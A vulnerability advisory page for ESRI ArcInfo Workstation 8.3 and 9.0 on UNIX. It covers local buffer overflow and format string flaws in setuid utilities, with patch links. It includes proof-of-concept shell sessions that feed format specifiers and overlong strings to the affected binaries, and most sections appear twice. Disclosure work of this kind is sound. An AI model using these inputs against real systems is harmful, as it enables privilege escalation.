ESRI ArcInfo Workstation Multiple Local Buffer Overflow And Format String Vulnerabilities
BID:13453
Info
ESRI ArcInfo Workstation Multiple Local Buffer Overflow And Format String Vulnerabilities
| Bugtraq ID: | 13453 |
| Class: | Unknown |
| CVE: |
CVE-2005-1393 CVE-2005-1394 |
| Remote: | No |
| Local: | Yes |
| Published: | Apr 30 2005 12:00AM |
| Updated: | Jul 12 2009 02:06PM |
| Credit: | Discovery is credited to Kevin Finisterre. |
| Vulnerable: |
ESRI ArcInfo Workstation on UNIX 9.0 ESRI ArcInfo Workstation on UNIX 8.3 |
| Not Vulnerable: | |
Discussion
ESRI ArcInfo Workstation Multiple Local Buffer Overflow And Format String Vulnerabilities
ESRI ArcInfo Workstation is prone to multiple local buffer overflow and format string vulnerabilities. These vulnerabilities exist in various setuid/setgid utilities installed by ArcInfo Workstation.
The vulnerabilities may be exploited to execute arbitrary code with elevated privileges.
It is believed that the vulnerabilities affect all ArcInfo Workstation installations on UNIX platforms.
ESRI ArcInfo Workstation is prone to multiple local buffer overflow and format string vulnerabilities. These vulnerabilities exist in various setuid/setgid utilities installed by ArcInfo Workstation.
The vulnerabilities may be exploited to execute arbitrary code with elevated privileges.
It is believed that the vulnerabilities affect all ArcInfo Workstation installations on UNIX platforms.
Exploit / POC
ESRI ArcInfo Workstation Multiple Local Buffer Overflow And Format String Vulnerabilities
The following proof-of-concept examples were provided:
-bash-2.05b$ export
ARCHOME=AAAABBBB%x.%x.%x.%x
-bash-2.05b$ ./wservice
Can not find or access
AAAABBBB7ffffc00.2a078.9e39c.241 - wservice not run!
-bash-2.05b# export ARCHOME=%x.%x.%x.%x
-bash-2.05b# ./lockmgr
Can not find or access 7ffffc00.2a15c.9e39c.36 - lockmgr not run!
-bash-2.05b# ./asmaster `perl -e 'print "A" x 2285'` b
FATAL ERROR
Segment Violation
-bash-2.05b# ./asuser `perl -e 'print "A" x 694'` a a a
FATAL ERROR
Segment Violation
-bash-2.05b# ./asutility DBDEF REMOVE `perl -e 'print "A" x 701'`
FATAL ERROR
Segment Violation
-bash-2.05b# ./asutility RMDB `perl -e 'print "A" x 1865'`
FATAL ERROR
Segment Violation
-bash-2.05b# ./asutility CHECKDBIDS AVAILABLE `perl -e 'print "A" x
804'`
FATAL ERROR
Segment Violation
-bash-2.05b# ../bin/se `perl -e 'print "A" x 1278'`
FATAL ERROR
Segment Violation
-bash-2.05b# ./asrecovery `perl -e 'print "A" x 1987'` a a a
FATAL ERROR
Segment Violation
Exploit code was also released for the 'wservice' format string vulnrability.
The following proof-of-concept examples were provided:
-bash-2.05b$ export
ARCHOME=AAAABBBB%x.%x.%x.%x
-bash-2.05b$ ./wservice
Can not find or access
AAAABBBB7ffffc00.2a078.9e39c.241 - wservice not run!
-bash-2.05b# export ARCHOME=%x.%x.%x.%x
-bash-2.05b# ./lockmgr
Can not find or access 7ffffc00.2a15c.9e39c.36 - lockmgr not run!
-bash-2.05b# ./asmaster `perl -e 'print "A" x 2285'` b
FATAL ERROR
Segment Violation
-bash-2.05b# ./asuser `perl -e 'print "A" x 694'` a a a
FATAL ERROR
Segment Violation
-bash-2.05b# ./asutility DBDEF REMOVE `perl -e 'print "A" x 701'`
FATAL ERROR
Segment Violation
-bash-2.05b# ./asutility RMDB `perl -e 'print "A" x 1865'`
FATAL ERROR
Segment Violation
-bash-2.05b# ./asutility CHECKDBIDS AVAILABLE `perl -e 'print "A" x
804'`
FATAL ERROR
Segment Violation
-bash-2.05b# ../bin/se `perl -e 'print "A" x 1278'`
FATAL ERROR
Segment Violation
-bash-2.05b# ./asrecovery `perl -e 'print "A" x 1987'` a a a
FATAL ERROR
Segment Violation
Exploit code was also released for the 'wservice' format string vulnrability.
Solution / Fix
ESRI ArcInfo Workstation Multiple Local Buffer Overflow And Format String Vulnerabilities
Solution:
The vendor has released patches for ArcInfo Workstation 9.0 on UNIX. Please see the "ArcInfo Workstation 9.0 Security Patch on UNIX" advisory for further details.
ESRI has released a patch for ArcInfo Workstation 8.3 on UNIX.
ESRI ArcInfo Workstation on UNIX 8.3
Solution:
The vendor has released patches for ArcInfo Workstation 9.0 on UNIX. Please see the "ArcInfo Workstation 9.0 Security Patch on UNIX" advisory for further details.
ESRI has released a patch for ArcInfo Workstation 8.3 on UNIX.
ESRI ArcInfo Workstation on UNIX 8.3
-
ESRI ArcInfo Workstation 8.3 Security Patch on UNIX
http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.vie wPatch&PID=14&MetaID=1020
References
ESRI ArcInfo Workstation Multiple Local Buffer Overflow And Format String Vulnerabilities
References:
References:
- ArcInfo Workstation 9.0 Security Patch on UNIX (ESRI)
- ArcInfo Workstation Homepage (ESRI)
- DMA[2005-0425a] - 'ESRI ArcGIS 9.x multiple local vulnerabilities' (Kevin Finisterre)